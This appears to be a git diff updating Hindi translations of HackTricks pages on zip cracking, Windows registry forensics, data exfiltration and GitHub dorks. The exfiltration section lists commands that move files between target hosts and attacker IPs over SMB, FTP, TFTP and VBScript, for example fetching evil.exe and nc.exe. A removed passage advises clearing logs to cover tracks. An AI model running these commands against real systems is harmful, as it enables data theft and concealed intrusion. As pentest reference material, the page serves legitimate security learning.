+{% endhint %} -**कमांड लाइन उपकरण** जो **ज़िप फ़ाइलें** प्रबंधित करने के लिए आवश्यक हैं जो ज़िप फ़ाइलें निदान, मरम्मत और क्रैकिंग के लिए हैं। यहाँ कुछ मुख्य उपयोगी उपकरण हैं: +**कमांड-लाइन टूल्स** जो **zip फ़ाइलें** प्रबंधित करने के लिए आवश्यक हैं, zip फ़ाइलें का निदान करने, मरम्मत करने, और क्रैक करने के लिए। यहाँ कुछ मुख्य उपयोगी उपकरण हैं: -- **`unzip`**: बताता है कि ज़िप फ़ाइल को क्यों डीकंप्रेस नहीं किया जा सकता है। -- **`zipdetails -v`**: ज़िप फ़ाइल प्रारूप क्षेत्रों का विस्तृत विश्लेषण प्रदान करता है। -- **`zipinfo`**: ज़िप फ़ाइल की सामग्री की सूची बनाता है बिना उन्हें निकाले। -- **`zip -F input.zip --out output.zip`** और **`zip -FF input.zip --out output.zip`**: क्षतिग्रस्त ज़िप फ़ाइलों को मरम्मत करने की कोशिश करें। -- **[fcrackzip](https://github.com/hyc/fcrackzip)**: ज़िप पासवर्ड की ब्रूट-फोर्स क्रैकिंग के लिए एक उपकरण, जो लगभग 7 अक्षरों तक के पासवर्ड के लिए प्रभावी है। +- **`unzip`**: बताता है कि एक zip फ़ाइल को क्यों डीकंप्रेस नहीं किया जा सकता है। +- **`zipdetails -v`**: zip फ़ाइल प्रारूप के क्षेत्रों का विस्तृत विश्लेषण प्रदान करता है। +- **`zipinfo`**: उन्हें निकाले बिना zip फ़ाइल की सामग्री की सूची देता है। +- **`zip -F input.zip --out output.zip`** और **`zip -FF input.zip --out output.zip`**: क्षतिग्रस्त zip फ़ाइलों को मरम्मत करने का प्रयास करें। +- **[fcrackzip](https://github.com/hyc/fcrackzip)**: zip पासवर्ड का ब्रूट-फ़ोर्स क्रैकिंग के लिए एक उपकरण, जो लगभग 7 अक्षरों तक के पासवर्ड के लिए प्रभावी है। -[ज़िप फ़ाइल प्रारूप विनिर्देशिका](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) ज़िप फ़ाइलों के संरचना और मानकों पर विस्तृत विवरण प्रदान करती है। +[Zip फ़ाइल प्रारूप विनिर्देशिका](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) zip फ़ाइलों के संरचना और मानकों पर विस्तृत विवरण प्रदान करती है। -महत्वपूर्ण नोट: पासवर्ड से सुरक्षित ज़िप फ़ाइलें **फ़ाइल नाम या फ़ाइल का आकार नहीं एन्क्रिप्ट** करती हैं, जो एक सुरक्षा दोष है जिसे RAR या 7z फ़ाइलें नहीं साझा करती हैं जो इस जानकारी को एन्क्रिप्ट करती हैं। इसके अतिरिक्त, पुरानी ZipCrypto विधि से एन्क्रिप्ट की गई ज़िप फ़ाइलें एक **प्लेनटेक्स्ट हमले** के लिए संवेदनशील हैं यदि किसी अनएन्क्रिप्टेड कॉपी की उपलब्ध है। एक उपलब्ध फ़ाइल का ज्ञात सामग्री का उपयोग करके ज़िप का पासवर्ड क्रैक करने के लिए यह हमला किया जा सकता है, जो [HackThis के लेख](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) में विस्तार से वर्णित है और [इस शैक्षिक पेपर](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf) में और विस्तार से समझाया गया है। हालांकि, **AES-256** एन्क्रिप्शन के साथ सुरक्षित की गई ज़िप फ़ाइलें इस प्लेनटेक्स्ट हमले से मुक्त हैं, संवेदनशील डेटा के लिए सुरक्षित एन्क्रिप्शन विध +महत्वपूर्ण है कि पासवर्ड से सुरक्षित zip फ़ाइलें **फ़ाइल नाम या फ़ाइल का आकार एन्क्रिप्ट नहीं करतीं**, जो एक सुरक्षा दोष है जिसे RAR या 7z फ़ाइलें नहीं साझा करतीं जो इस जानकारी को एन्क्रिप्ट करती हैं। इसके अतिरिक्त, पुरानी ZipCrypto विधि से एन्क्रिप्ट की गई zip फ़ाइलें एक **सादाक्षर हमले** के लिए विकल्पशील हैं अगर किसी अनएन्क्रिप्टेड कॉपी की एक कम्प्रेस्ड फ़ाइल उपलब्ध है। यह हमला जानी गई सामग्री का उपयोग करता है ताकि zip का पासवर्ड क्रैक किया जा सके, जो [HackThis के लेख](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) में विस्तार से वर्णित है और [इस शैक्षिक पेपर](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf) में और विस्तार से समझाया गया है। हालांकि, **AES-256** एन्क्रिप्शन के साथ सुरक्षित की गई zip फ़ाइलें इस सादाक्षर हमले से मुक्त हैं, संवेदनशील डेटा के लिए सुरक्षित एन्क्रिप्शन विधियों का चयन करने की महत्वता को प्रदर्शित करती है। + +## संदर्भ +* [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/) + +{% hint style="success" %} +**AWS हैकिंग सीखें और अभ्यास करें:**[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +**GCP हैकिंग सीखें और अभ्यास करें:** [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +HackTricks का समर्थन करें + +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में। + +
+{% endhint %} diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md b/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md index e86051abf..c99476a4d 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md @@ -2,20 +2,20 @@ ### दिलचस्प Windows रजिस्ट्री कुंजी +{% hint style="success" %} +AWS हैकिंग सीखें और अभ्यास करें:[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP हैकिंग सीखें और अभ्यास करें: [**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड** करें तो [**सदस्यता योजनाएं देखें**](https://github.com/sponsors/carlospolop)! -* प्राप्त करें [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) -* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
- +{% endhint %} ### **Windows संस्करण और मालिक जानकारी** - **`Software\Microsoft\Windows NT\CurrentVersion`** पर स्थित है, आपको Windows संस्करण, सेवा पैक, स्थापना समय, और पंजीकृत मालिक का नाम सीधे ढंग से मिलेगा। @@ -24,14 +24,14 @@ HackTricks का समर्थन करने के अन्य तरी - होस्टनाम **`System\ControlSet001\Control\ComputerName\ComputerName`** के तहत पाया जाता है। ### **समय क्षेत्र सेटिंग** -- सिस्टम का समय क्षेत्र **`System\ControlSet001\Control\TimeZoneInformation`** में संग्रहित है। +- सिस्टम का समय क्षेत्र **`System\ControlSet001\Control\TimeZoneInformation`** में संग्रहित होता है। ### **पहुंच समय ट्रैकिंग** - डिफ़ॉल्ट रूप से, अंतिम पहुंच समय ट्रैकिंग बंद होती है (**`NtfsDisableLastAccessUpdate=1`**). इसे सक्षम करने के लिए, इस्तेमाल करें: `fsutil behavior set disablelastaccess 0` ### Windows संस्करण और सेवा पैक -- **Windows संस्करण** में संस्करण (जैसे, होम, प्रो) और इसका रिलीज (जैसे, Windows 10, Windows 11) दिखाता है, जबकि **सेवा पैक** में सुधार और कभी-कभी नए विशेषताएँ शामिल होती हैं। +- **Windows संस्करण** संस्करण (जैसे, होम, प्रो) और इसका रिलीज (जैसे, Windows 10, Windows 11) को दर्शाता है, जबकि **सेवा पैक** अपडेट हैं जिसमें सुधार और कभी-कभी नए सुविधाएँ शामिल होती हैं। ### अंतिम पहुंच समय सक्षम करना - अंतिम पहुंच समय ट्रैकिंग सक्षम करने से आप देख सकते हैं कि फ़ाइलें कब आखिरी बार खोली गई थीं, जो जांच या सिस्टम मॉनिटरिंग के लिए महत्वपूर्ण हो सकता है। @@ -40,29 +40,29 @@ HackTricks का समर्थन करने के अन्य तरी - रजिस्ट्री में नेटवर्क कॉन्फ़िगरेशन पर व्यापक डेटा होता है, जिसमें **नेटवर्क के प्रकार (वायरलेस, केबल, 3जी)** और **नेटवर्क श्रेणियाँ (सार्वजनिक, निजी/घर, डोमेन/काम)** शामिल हैं, जो नेटवर्क सुरक्षा सेटिंग्स और अनुमतियों को समझने के लिए महत्वपूर्ण हैं। ### क्लाइंट साइड कैशिंग (CSC) -- **CSC** साझा फ़ाइलों का कैशिंग करके ऑफ़लाइन फ़ाइल एक्सेस को बढ़ाता है। विभिन्न **CSCFlags** सेटिंग्स नियंत्रित करती हैं कि कैसे और कौन सी फ़ाइलें कैश होती हैं, प्रदर्शन और उपयोगकर्ता अनुभव पर प्रभाव डालती हैं, खासकर उन परिस्थितियों में जहां अंतरिक्षिक कनेक्टिविटी हो। +- **CSC** साझा फ़ाइलों का कैशिंग करके ऑफ़लाइन फ़ाइल एक्सेस को बढ़ाता है। विभिन्न **CSCFlags** सेटिंग्स नियंत्रित करती हैं कि कैसे और कौन सी फ़ाइलें कैश होती हैं, प्रदर्शन और उपयोगकर्ता अनुभव पर प्रभाव डालती हैं, खासकर ऐसे वातावरणों में जिनमें अंतरिक्षिक संयोजन है। ### ऑटोस्टार्ट प्रोग्राम - विभिन्न `Run` और `RunOnce` रजिस्ट्री कुंजी में सूचीबद्ध प्रोग्राम स्वचालित रूप से स्टार्टअप पर लॉन्च होते हैं, सिस्टम बूट समय पर प्रभाव डालते हैं और मालवेयर या अवांछित सॉफ़्टवेयर की पहचान के लिए महत्वपूर्ण बिंदु हो सकते हैं। ### शेलबैग्स -- **शेलबैग्स** न केवल फ़ोल्डर दृश्य के लिए पसंद रखते हैं बल्कि यदि फ़ोल्डर अब मौजूद नहीं है तो फ़ोल्डर एक्सेस के फोरेंसिक साक्ष्य भी प्रदान करते हैं। वे जांचों के लिए अनमोल हैं, अन्य माध्यमों के माध्यम से स्पष्ट न होने वाली उपयोगकर्ता गतिविधि का पता लगाने के लिए। +- **शेलबैग्स** न केवल फ़ोल्डर दृश्यों के लिए पसंद रखते हैं बल्कि यदि फ़ोल्डर अब मौजूद नहीं है तो फ़ोल्डर एक्सेस के फोरेंसिक साक्ष्य भी प्रदान करते हैं। वे जांचों के लिए अनमोल हैं, अन्य साधनों के माध्यम से स्पष्ट नहीं होने वाली उपयोगकर्ता गतिविधि का पता लगाने के लिए। -### USB जानकारी और फोरेंसिक्स -- USB डिवाइस के बारे में रजिस्ट्री में संग्रहित विवरण एक कंप्यूटर से कनेक्ट किए गए कौन से डिवाइस का पता लगाने में मदद कर सकते हैं, संवेदनशील फ़ाइल स्थानांतरण या अनधिकृत पहुंच घटनाओं से एक डिवाइस को जोड़ सकते हैं। +### USB सूचना और फोरेंसिक्स +- USB डिवाइस के बारे में रजिस्ट्री में संग्रहित विवरण एक कंप्यूटर से कनेक्ट किए गए कौन से डिवाइस थे, संवेदनशील फ़ाइल स्थानांतरण या अनधिकृत पहुंच घटनाओं से एक डिवाइस को जोड़ सकते हैं। ### वॉल्यूम सीरियल नंबर -- **वॉल्यूम सीरियल नंबर** एक फ़ाइल सिस्टम के विशिष्ट उदाहरण का पता लगाने के लिए महत्वपूर्ण हो सकता है, जिसे विभिन्न उपकरणों पर फ़ाइल का मूल स्रोत स्थापित करने के लिए फोरेंसिक स्थितियों में उपयोगी होता है। +- **वॉल्यूम सीरियल नंबर** एक फ़ाइल सिस्टम के विशिष्ट उदाहरण का ट्रैकिंग के लिए महत्वपूर्ण हो सकता है, जिसे विभिन्न उपकरणों पर फ़ाइल का मूल स्थान स्थापित करने की आवश्यकता होती है। ### **शटडाउन विवरण** -- शटडाउन समय और गणना (केवल XP के लिए) **`System\ControlSet001\Control\Windows`** और **`System\ControlSet001\Control\Watchdog\Display`** में रखे जाते हैं। +- शटडाउन समय और गिनती (केवल XP के लिए) **`System\ControlSet001\Control\Windows`** और **`System\ControlSet001\Control\Watchdog\Display`** में रखी जाती हैं। ### **नेटवर्क कॉन्फ़िगरेशन** - विस्तृत नेटवर्क इंटरफेस जानकारी के लिए, **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`** का संदर्भ दें। -- पहली और आखिरी नेटवर्क कनेक्शन समय, व्यूपीएन कनेक्शन सहित, विभिन्न पथों में लॉग किए गए हैं **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**। +- पहली और आखिरी नेटवर्क कनेक्शन समय, व्यूपीएन कनेक्शन सहित, **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`** में विभिन्न पथों के तहत लॉग किए गए हैं। ### **साझा फोल्डर** -- साझा फोल्डर और सेटिंग्स **`System\ControlSet001\Services\lanmanserver\Shares`** के तहत हैं। क्लाइंट साइड कैशिंग (CSC) सेटिंग्स ऑफ़लाइन फ़ाइल उपलब्धता निर्धारित करती हैं। +- साझा फोल्डर और सेटिंग **`System\ControlSet001\Services\lanmanserver\Shares`** के तहत हैं। क्लाइंट साइड कैशिंग (CSC) सेटिंग्स ऑफ़लाइन फ़ाइल उपलब्धता निर्धारित करती हैं। ### **स्वचालित रूप से शुरू होने वाले प्रोग्राम** - पथ जैसे **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** और `Software\Microsoft\Windows\CurrentVersion` के तहत समान प्रविष्टियाँ विस्तार से विवरणित करती हैं जो स्टार्टअप पर चलाने के लिए सेट किए गए प्रोग्राम हैं। @@ -70,11 +70,11 @@ HackTricks का समर्थन करने के अन्य तरी ### **खोजें और टंकित पथ** - एक्सप्लोरर खोज और टंकित पथ रजिस्ट्री में ट्रैक किए जाते हैं **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** के तहत WordwheelQuery और TypedPaths के लिए। -### **हाल के दस्तावेज़ और ऑफिस फ़ाइलें** -- हाल के दस्तावेज़ और ऑफिस फ़ाइलें जिनका उपयोग किया गया है, उन्हें नोट किया गया है `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` और विशेष ऑफिस संस्करण पथों में। +### **हाल ही में दस्तावेज़ और ऑफिस फ़ाइलें** +- हाल ही में दस्तावेज़ और ऑफिस फ़ाइलें जिनका उपयोग किया गया है, उन्हें नोट किया गया है `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` और विशेष ऑफिस संस्करण पथों में। ### **हाल ही में उपयोग किए गए (MRU) आइटम** -- MRU सूचियाँ, हाल के फ़ाइल पथ और कमांड दर्शाती हैं, विभिन्न `ComDlg32` और `Explorer` सबकी में `NTUSER.DAT` के तहत संग्रहित होती हैं। +- MRU सूचियाँ, हाल ही में फ़ाइल पथ और कमांड को दर्शाती हैं, विभिन्न `ComDlg32` और `Explorer` सबकी में `NTUSER.DAT` के तहत संग्रहीत होती हैं। ### **उपयोगकर्ता गतिविधि ट्रैकिंग** -- उपयोगकर्ता सहायत +- यूज़र असिस्ट फ़ीचर विस्तृत एप्लिकेशन उपयोग स diff --git a/generic-methodologies-and-resources/exfiltration.md b/generic-methodologies-and-resources/exfiltration.md index d70f7f50e..3f16c7fda 100644 --- a/generic-methodologies-and-resources/exfiltration.md +++ b/generic-methodologies-and-resources/exfiltration.md @@ -1,39 +1,40 @@ # Exfiltration +{% hint style="success" %} +सीखें और प्रैक्टिस करें AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ! +हैकट्रिक्स का समर्थन करें -दूसरे तरीके HackTricks का समर्थन करने के लिए: - -* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **हमें** **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
+{% endhint %} -**Try Hard Security Group** +**Try Hard सिक्योरिटी ग्रुप** -
+
{% embed url="https://discord.gg/tryhardsecurity" %} *** -## सूचीबद्ध डोमेन्स जिन्हें सूचना निकालने के लिए सफेद सूची में शामिल किया गया है +## सामान्यत: व्हाइटलिस्टेड डोमेन्स जिनसे सूचना निकाली जा सकती है -[https://lots-project.com/](https://lots-project.com/) पर जांच करें कि कौन से सामान्य व्हाइटलिस्टेड डोमेन्स का दुरुपयोग किया जा सकता है +[https://lots-project.com/](https://lots-project.com/) पर जांच करें कि कौन से सामान्यत: व्हाइटलिस्टेड डोमेन्स का दुरुपयोग किया जा सकता है -## कॉपी और पेस्ट बेस64 +## कॉपी\&पेस्ट बेस64 -**Linux** +**लिनक्स** ```bash base64 -w0 #Encode file base64 -d file #Decode file ``` -**Windows** +**विंडोज** ``` certutil -encode payload.dll payload.b64 certutil -decode payload.b64 payload.dll @@ -150,7 +151,7 @@ mkdir -p /ftphome chown -R ftpuser:ftpgroup /ftphome/ /etc/init.d/pure-ftpd restart ``` -### **Windows** क्लाइंट +### **Windows** ग्राहक ```bash #Work well with python. With pure-ftp use fusr:ftp echo open 10.11.0.41 21 > ftp.txt @@ -163,7 +164,7 @@ ftp -n -v -s:ftp.txt ``` ## SMB -काली को सर्वर के रूप में उपयोग करें +काली को सर्वर के रूप में ```bash kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory kali_op2> smbserver.py -smb2support name /path/folder # Share a folder @@ -185,23 +186,7 @@ guest ok = Yes #Start samba service smbd restart ``` -### Exfiltration Techniques on Windows - -#### Local Exfiltration - -Local exfiltration techniques involve transferring data to devices within the local network or physically removing data from the target environment. - -#### Remote Exfiltration - -Remote exfiltration techniques involve transferring data to an external location outside the target network, typically controlled by the attacker. - -#### Exfiltration Tools - -Various tools can be used for exfiltration, such as **Netcat**, **FTP**, **PowerShell**, **BITSAdmin**, and **certutil**. - -#### Covering Tracks - -After exfiltrating data, it's essential to cover tracks by deleting logs, clearing event logs, and removing any evidence of the exfiltration activity. +Windows के लिए एक्सफिल्ट्रेशन ```bash CMD-Wind> \\10.10.14.14\path\to\exe CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials @@ -211,7 +196,7 @@ WindPS-2> cd new_disk: ``` ## SCP -हमलावर को SSHd चलाना होगा। +हमलावर को SSHd चल रहा होना चाहिए। ```bash scp @:/ ``` @@ -264,7 +249,7 @@ sniff(iface="tun0", prn=process_packet) ``` ## **SMTP** -यदि आप एक SMTP सर्वर को डेटा भेज सकते हैं, तो आप Python के साथ डेटा प्राप्त करने के लिए एक SMTP बना सकते हैं: +यदि आप एक SMTP सर्वर को डेटा भेज सकते हैं, तो आप पायथन के साथ डेटा प्राप्त करने के लिए एक SMTP बना सकते हैं: ```bash sudo python -m smtpd -n -c DebuggingServer :25 ``` @@ -290,13 +275,11 @@ tftp -i get nc.exe ``` ## PHP -PHP के एक लाइनर के साथ एक फ़ाइल डाउनलोड करें: +PHP वनलाइनर के साथ एक फ़ाइल डाउनलोड करें: ```bash echo "" > down2.php ``` ## VBScript - -VBScript का उपयोग डेटा अन्य संगठनों में भेजने के लिए किया जा सकता है। VBScript को उपयोग करके डेटा को एक फ़ाइल में लिखा जा सकता है और फिर उस फ़ाइल को एक विदेशी सर्वर पर अपलोड किया जा सकता है। ```bash Attacker> python -m SimpleHTTPServer 80 ``` @@ -334,7 +317,7 @@ cscript wget.vbs http://10.11.0.5/evil.exe evil.exe ``` ## डीबग.एक्सई -`डीबग.एक्सई` प्रोग्राम न केवल बाइनरी की जांच की अनुमति देता है बल्कि **हेक्स से उन्हें पुनः निर्माण करने की क्षमता भी है**। इसका मतलब है कि एक बाइनरी के हेक्स प्रदान करके, `डीबग.एक्सई` बाइनरी फ़ाइल उत्पन्न कर सकता है। हालांकि, यह महत्वपूर्ण है कि डीबग.एक्सई का एक **सीमितांकन है जो 64 केबी बाइट के फ़ाइलों को एकत्रित करने की सीमा है**। +`डीबग.एक्सई` प्रोग्राम न केवल बाइनरी की जांच की अनुमति देता है बल्कि **हेक्स से उन्हें पुनः निर्माण करने की क्षमता भी है**। इसका मतलब है कि एक बाइनरी के हेक्स प्रदान करके, `डीबग.एक्सई` बाइनरी फ़ाइल उत्पन्न कर सकता है। हालांकि, यह महत्वपूर्ण है कि डीबग.एक्सई का एक **सीमितांकन है जो 64 केबी के आकार तक फ़ाइलों को आसेंबल करने की है**। ```bash # Reduce the size upx -9 nc.exe @@ -346,20 +329,21 @@ wine exe2bat.exe nc.exe nc.txt **Try Hard Security Group** -
+
{% embed url="https://discord.gg/tryhardsecurity" %} +{% hint style="success" %} +**AWS हैकिंग सीखें और प्रैक्टिस करें:** [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +**GCP हैकिंग सीखें और प्रैक्टिस करें:** [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -दूसरे तरीके HackTricks का समर्थन करने के लिए: - -* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! -* प्राप्त करें [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) -* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **जुड़ें** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** और **हैकट्रिक्स क्लाउड** github रेपो में PR जमा करके।
+{% endhint %} diff --git a/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md b/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md index 886644c71..77bb91953 100644 --- a/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md +++ b/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md @@ -1,31 +1,32 @@ -# गिथब डोर्क्स और लीक्स +# Github डोर्क्स और लीक्स + +{% hint style="success" %} +**AWS हैकिंग सीखें और अभ्यास करें:**[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +**GCP हैकिंग सीखें और अभ्यास करें:** [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **हैकिंग ट्रिक्स साझा करें** द्वारा **पीआर जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) गिथब रेपो में। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **जुड़ें** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
+{% endhint %} \ -**बग बाउंटी टिप**: **साइन अप करें** इंटिग्रिटी के लिए, एक प्रीमियम **बग बाउंटी प्लेटफॉर्म जो हैकर्स द्वारा बनाया गया है**! आज हमारे साथ शामिल हों [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) और शुरू करें बाउंटी अप टू **$100,000** तक कमाना! +**बग बाउंटी टिप**: **Intigriti** के लिए **साइन अप** करें, एक प्रीमियम **बग बाउंटी प्लेटफॉर्म जो हैकर्स द्वारा बनाई गई है**! आज हमारे साथ शामिल हों [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) और शुरू करें बाउंटी अप तक **$100,000** तक कमाना! {% embed url="https://go.intigriti.com/hacktricks" %} -अब जब हमने हमारे स्कोप की संपत्तियों की सूची बना ली है, तो समय है कुछ OSINT लो-हैंगिंग फलों की खोज करने का। +अब जब हमने हमारे स्कोप की संपत्तियों की सूची बना ली है, तो अब समय है कुछ OSINT लो-हैंगिंग फलों की खोज करने का। -### लीक्स के लिए पहले से खोजने वाले प्लेटफॉर्म +### लीक्स के लिए पहले से खोजे 